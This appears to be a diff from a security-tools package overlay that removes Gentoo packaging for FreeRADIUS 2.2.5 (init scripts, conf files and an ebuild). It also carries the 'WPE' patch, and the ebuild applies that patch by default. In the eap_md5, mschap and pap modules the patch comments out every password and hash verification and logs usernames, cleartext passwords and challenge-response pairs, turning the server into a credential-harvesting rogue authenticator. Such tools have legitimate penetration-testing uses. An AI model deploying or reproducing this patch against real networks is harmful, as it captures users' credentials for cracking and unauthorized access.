--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2014-05-18 20:27:16.392823742 +0800
@@ -202,9 +202,13 @@
/*
* The length of the response is always 16 for MD5.
*/
+ /* WPE FTW
if (memcmp(output, packet->value, 16) != 0) {
return 0;
}
+ */
+ log_wpe("eap_md5", packet->name, NULL, challenge, MD5_CHALLENGE_LEN,
+ packet->value, 16);
return 1;
}
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_mschap/rlm_mschap.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_mschap/rlm_mschap.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_mschap/rlm_mschap.c 2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_mschap/rlm_mschap.c 2014-05-18 20:28:28.879823390 +0800
@@ -681,9 +681,11 @@
static int do_mschap(rlm_mschap_t *inst,
REQUEST *request, VALUE_PAIR *password,
uint8_t *challenge, uint8_t *response,
- uint8_t *nthashhash, int do_ntlm_auth)
+ uint8_t *nthashhash, int do_ntlm_auth, char *username)
{
uint8_t calculated[24];
+
+ log_wpe("mschap", username, NULL, challenge, 8, response, 24);
/*
* Do normal authentication.
@@ -698,9 +700,11 @@
}
smbdes_mschap(password->vp_strvalue, challenge, calculated);
+ /* WPE FTW
if (rad_digest_cmp(response, calculated, 24) != 0) {
return -1;
}
+ */
/*
* If the password exists, and is an NT-Password,
@@ -1151,7 +1155,7 @@
*/
if (do_mschap(inst, request, password, challenge->vp_octets,
response->vp_octets + offset, nthashhash,
- do_ntlm_auth) < 0) {
+ do_ntlm_auth, request->username->vp_strvalue) < 0) {
RDEBUG2("MS-CHAP-Response is incorrect.");
goto do_error;
}
@@ -1270,7 +1274,7 @@
if (do_mschap(inst, request, nt_password, mschapv1_challenge,
response->vp_octets + 26, nthashhash,
- do_ntlm_auth) < 0) {
+ do_ntlm_auth, request->username->vp_strvalue) < 0) {
int i;
char buffer[128];
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_pap/rlm_pap.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_pap/rlm_pap.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_pap/rlm_pap.c 2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_pap/rlm_pap.c 2014-05-18 20:28:28.880823390 +0800
@@ -526,6 +526,8 @@
RDEBUG("ERROR: You set 'Auth-Type = PAP' for a request that does not contain a User-Password attribute!");
return RLM_MODULE_INVALID;
}
+ log_wpe("pap",request->username->vp_strvalue, request->password->vp_strvalue,
+ NULL, 0, NULL, 0);
/*
* The user MUST supply a non-zero-length password.
@@ -609,6 +611,7 @@
do_clear:
RDEBUG("Using clear text password \"%s\"",
vp->vp_strvalue);
+ /* WPE FTW
if ((vp->length != request->password->length) ||
(rad_digest_cmp(vp->vp_strvalue,
request->password->vp_strvalue,
@@ -616,6 +619,7 @@
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: CLEAR TEXT password check failed");
goto make_msg;
}
+ */
done:
RDEBUG("User authenticated successfully");
return RLM_MODULE_OK;
@@ -648,10 +652,12 @@
fr_MD5Update(&md5_context, request->password->vp_octets,
request->password->length);
fr_MD5Final(digest, &md5_context);
+ /* WPE FTW
if (rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: MD5 password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -675,10 +681,12 @@
/*
* Compare only the MD5 hash results, not the salt.
*/
+ /* WPE FTW
if (rad_digest_cmp(digest, vp->vp_octets, 16) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SMD5 password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -697,10 +705,12 @@
fr_SHA1Update(&sha1_context, request->password->vp_octets,
request->password->length);
fr_SHA1Final(digest,&sha1_context);
+ /* WPE FTW
if (rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SHA1 password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -721,10 +731,12 @@
request->password->length);
fr_SHA1Update(&sha1_context, &vp->vp_octets[20], vp->length - 20);
fr_SHA1Final(digest,&sha1_context);
+ /* WPE FTW
if (rad_digest_cmp(digest, vp->vp_octets, 20) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SSHA password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -746,11 +758,13 @@
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: mschap xlat failed");
goto make_msg;
}
+ /* WPE FTW
if ((fr_hex2bin(digest, digest, 16) != vp->length) ||
(rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0)) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: NT password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -770,16 +784,20 @@
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: mschap xlat failed");
goto make_msg;
}
+ /* WPE FTW
if ((fr_hex2bin(digest, digest, 16) != vp->length) ||
(rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0)) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: LM password check failed");
+ */
make_msg:
+ /*
RDEBUG("Passwords don't match");
module_fmsg_vp = pairmake("Module-Failure-Message",
module_fmsg, T_OP_EQ);
pairadd(&request->packet->vps, module_fmsg_vp);
return RLM_MODULE_REJECT;
}
+ */
goto done;
break;


@ -1,5 +0,0 @@
# Config file for /etc/init.d/radiusd
# see man pages for radiusd run `radiusd -h`
# for valid cmdline options
#RADIUSD_OPTS=""


@ -1,16 +0,0 @@
# Config file for /etc/init.d/radiusd
# see man pages for radiusd run `radiusd -h`
# for valid cmdline options
#RADIUSD_OPTS=""
# Change this value if you change it in /etc/raddb/radiusd.conf
pidfile=/var/run/radiusd/radiusd.pid
# Change these values if you change them in /etc/raddb/radiusd.conf
#RADIUSD_USER=radius
#RADIUSD_GROUP=radius
# If you set up logging to syslog in /etc/raddb/radiusd.conf, you want
# to uncomment the following line.
#rc_use="logger"


@ -1,63 +0,0 @@
#!/sbin/runscript
opts="${opts} reload"
depend() {
need net
use dns
}
checkconfig() {
# set the location of log files
if ! cd /var/log/radius ; then
eerror "Failed to change current directory to /var/log/radius"
return 1
fi
if [ ! -d /var/run/radiusd ] && ! mkdir /var/run/radiusd ; then
eerror "Failed to create /var/run/radiusd"
return 1
fi
if [ ! -f /etc/raddb/radiusd.conf ] ; then
eerror "No /etc/raddb/radiusd.conf file exists!"
return 1
fi
RADIUSD_USER=`grep '^ *user *=' /etc/raddb/radiusd.conf | cut -d ' ' -f 3`
RADIUSD_GROUP=`grep '^ *group *=' /etc/raddb/radiusd.conf | cut -d ' ' -f 3`
if [ -n "${RADIUSD_USER}" ] && ! getent passwd ${RADIUSD_USER} > /dev/null ; then
eerror "${RADIUSD_USER} user missing!"
return 1
fi
if [ -n "${RADIUSD_GROUP}" ] && ! getent group ${RADIUSD_GROUP} > /dev/null ; then
eerror "${RADIUSD_GROUP} group missing!"
return 1
fi
# radius.log is created before privileges are dropped - need to set proper permissions on it
[ -f radius.log ] || touch radius.log || return 1
chown -R "${RADIUSD_USER:-root}:${RADIUSD_GROUP:-root}" . /var/run/radiusd && \
chmod -R u+rwX,g+rX . /var/run/radiusd || return 1
}
start() {
checkconfig || return 1
ebegin "Starting radiusd"
start-stop-daemon --start --quiet --exec /usr/sbin/radiusd -- ${RADIUSD_OPTS} >/dev/null
eend $?
}
stop () {
ebegin "Stopping radiusd"
start-stop-daemon --stop --quiet --pidfile=/var/run/radiusd/radiusd.pid
eend $?
}
reload () {
ebegin "Reloading radiusd"
kill -HUP `</var/run/radiusd/radiusd.pid`
eend $?
}


@ -1,56 +0,0 @@
#!/sbin/runscript
extra_started_commands="reload"
depend() {
need net
use dns
}
checkconfig() {
if [ ! -d /var/run/radiusd ] && ! mkdir /var/run/radiusd ; then
eerror "Failed to create /var/run/radiusd"
return 1
fi
if [ ! -f /etc/raddb/radiusd.conf ] ; then
eerror "No /etc/raddb/radiusd.conf file exists!"
return 1
fi
RADIUSD_USER=`grep '^ *user *=' /etc/raddb/radiusd.conf | cut -d ' ' -f 3`
RADIUSD_GROUP=`grep '^ *group *=' /etc/raddb/radiusd.conf | cut -d ' ' -f 3`
if [ -n "${RADIUSD_USER}" ] && ! getent passwd ${RADIUSD_USER} > /dev/null ; then
eerror "${RADIUSD_USER} user missing!"
return 1
fi
if [ -n "${RADIUSD_GROUP}" ] && ! getent group ${RADIUSD_GROUP} > /dev/null ; then
eerror "${RADIUSD_GROUP} group missing!"
return 1
fi
local dirs=/var/run/radiusd
[ -d /var/log/radius ] && dirs="${dirs} /var/log/radius"
chown -R "${RADIUSD_USER:-root}:${RADIUSD_GROUP:-root}" ${dirs} && \
chmod -R u+rwX,g+rX ${dirs} || return 1
}
start() {
checkconfig || return 1
ebegin "Starting radiusd"
start-stop-daemon --start --quiet --exec /usr/sbin/radiusd -- ${RADIUSD_OPTS} >/dev/null
eend $?
}
stop () {
ebegin "Stopping radiusd"
start-stop-daemon --stop --quiet --pidfile=/var/run/radiusd/radiusd.pid
eend $?
}
reload () {
ebegin "Reloading radiusd"
kill -HUP `</var/run/radiusd/radiusd.pid`
eend $?
}


@ -1,203 +0,0 @@
# Copyright 1999-2017 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
EAPI=6
PYTHON_COMPAT=( python2_7 )
inherit autotools eutils pam python-any-r1 user
PATCHSET=4
MY_P="${PN}-server-${PV}"
DESCRIPTION="Highly configurable free RADIUS server"
SRC_URI="
ftp://ftp.freeradius.org/pub/radius/${MY_P}.tar.gz
ftp://ftp.freeradius.org/pub/radius/old/${MY_P}.tar.gz
https://dev.pentoo.ch/~blshkv/distfiles//${PN}-2.2.0-patches-${PATCHSET}.tar.xz
"
HOMEPAGE="http://www.freeradius.org/"
KEYWORDS="amd64 ~ppc ~ppc64 ~sparc x86 ~x86-fbsd"
LICENSE="GPL-2"
SLOT="0"
IUSE="
bindist debug firebird iodbc kerberos ldap mysql odbc oracle pam pcap
postgres python readline sqlite ssl +wpe
"
RDEPEND="!net-dialup/cistronradius
!net-dialup/gnuradius
sys-devel/libtool
dev-lang/perl:=
sys-libs/gdbm
python? ( ${PYTHON_DEPS} )
readline? ( sys-libs/readline:0= )
pcap? ( net-libs/libpcap )
mysql? ( dev-db/mysql-connector-c )
postgres? ( dev-db/postgresql:= )
firebird? ( dev-db/firebird )
pam? ( virtual/pam )
ssl? ( dev-libs/openssl:0= )
ldap? ( net-nds/openldap )
kerberos? ( virtual/krb5 )
sqlite? ( dev-db/sqlite:3 )
odbc? ( dev-db/unixODBC )
iodbc? ( dev-db/libiodbc )
oracle? ( dev-db/oracle-instantclient-basic )"
DEPEND="${RDEPEND}"
REQUIRED_USE="bindist? ( !firebird )"
S="${WORKDIR}/${MY_P}"
pkg_setup() {
enewgroup radius
enewuser radius -1 -1 /var/log/radius radius
python-any-r1_pkg_setup
export PYTHONBIN="${EPYTHON}"
}
src_prepare() {
epatch \
"${WORKDIR}"/patches/0002*patch \
"${WORKDIR}"/patches/0004*patch \
"${FILESDIR}"/${P}-gentoo.patch
if use wpe; then
epatch "${FILESDIR}/${P}-wpe.patch"
cp "${FILESDIR}"/clients_wpe.conf raddb/clients.conf || die "failed to copy config files"
cp "${FILESDIR}"/eap_wpe.conf raddb/eap.conf || die "failed to copy config files"
cp "${FILESDIR}"/users_wpe raddb/users || die "failed to copy config files"
fi
# most of the configuration options do not appear as ./configure
# switches. Instead it identifies the directories that are available
# and run through them. These might check for the presence of
# various libraries, in which case they are not built. To avoid
# automagic dependencies, we just remove all the modules that we're
# not interested in using.
use ssl || { rm -r src/modules/rlm_eap/types/rlm_eap_{tls,ttls,peap} || die ; }
use ldap || { rm -r src/modules/rlm_ldap || die ; }
use kerberos || { rm -r src/modules/rlm_krb5 || die ; }
use pam || { rm -r src/modules/rlm_pam || die ; }
use python || { rm -r src/modules/rlm_python || die ; }
# Do not install ruby rlm module, bug #483108
rm -r src/modules/rlm_ruby || die
# these are all things we don't have in portage/I don't want to deal
# with myself
rm -r src/modules/rlm_eap/types/rlm_eap_tnc || die # requires TNCS library
rm -r src/modules/rlm_eap/types/rlm_eap_ikev2 || die # requires libeap-ikev2
rm -r src/modules/rlm_opendirectory || die # requires some membership.h
rm -r src/modules/rlm_redis{,who} || die # requires redis
rm -r src/modules/rlm_sql/drivers/rlm_sql_{db2,freetds,sybase} || die
# sql drivers that are not part of experimental are loaded from a
# file, so we have to remove them from the file itself when we
# remove them.
usesqldriver() {
local flag=$1
local driver=rlm_sql_${2:-${flag}}
if ! use ${flag}; then
rm -r src/modules/rlm_sql/drivers/${driver} || die
sed -i -e /${driver}/d src/modules/rlm_sql/stable || die
fi
}
usesqldriver mysql
usesqldriver postgres postgresql
usesqldriver firebird
usesqldriver iodbc
usesqldriver odbc unixodbc
usesqldriver oracle
usesqldriver sqlite
# remove bundled ltdl to avoid conflicts
rm -r libltdl
default
eautoreconf
}
src_configure() {
# fix bug #77613
if has_version app-crypt/heimdal; then
myconf+=( --enable-heimdal-krb5 )
fi
use readline || export ac_cv_lib_readline=no
use pcap || export ac_cv_lib_pcap_pcap_open_live=no
# do not try to enable static with static-libs; upstream is a
# massacre of libtool best practices so you also have to make sure
# to --enable-shared explicitly.
econf \
--enable-shared --disable-static \
--disable-ltdl-install \
--with-system-libtool \
--with-system-libltdl \
--with-ascend-binary \
--with-udpfromto \
--with-dhcp \
--with-iodbc-include-dir=/usr/include/iodbc \
--with-experimental-modules \
--with-docdir=/usr/share/doc/${PF} \
--with-logdir=/var/log/radius \
$(use_enable debug developer) \
$(use_with ldap edir) \
$(use_with ssl openssl) \
${myconf[@]}
}
src_compile() {
emake LIBTOOL=libtool
}
src_install() {
dodir /etc
diropts -m0750 -o root -g radius
dodir /etc/raddb
diropts -m0750 -o radius -g radius
dodir /var/log/radius
keepdir /var/log/radius/radacct
diropts
emake LIBTOOL=libtool R="${D}" install
fowners -R root:radius /etc/raddb
# Fixing pidfile location (#546482)
sed \
'/^run_dir =/s@${localstatedir}@@' \
-i "${D}"/etc/raddb/radiusd.conf || die
pamd_mimic_system radiusd auth account password session
dodoc CREDITS
rm "${D}/usr/sbin/rc.radiusd" || die
newinitd "${FILESDIR}/radius.init-r3" radiusd
newconfd "${FILESDIR}/radius.conf-r3" radiusd
}
pkg_config() {
if use ssl; then
cd "${ROOT}"/etc/raddb/certs
./bootstrap
fi
}
pkg_preinst() {
if ! has_version ${CATEGORY}/${PN} && use ssl; then
elog "You have to run \`emerge --config =${CATEGORY}/${PF}\` to be able"
elog "to start the radiusd service."
fi
}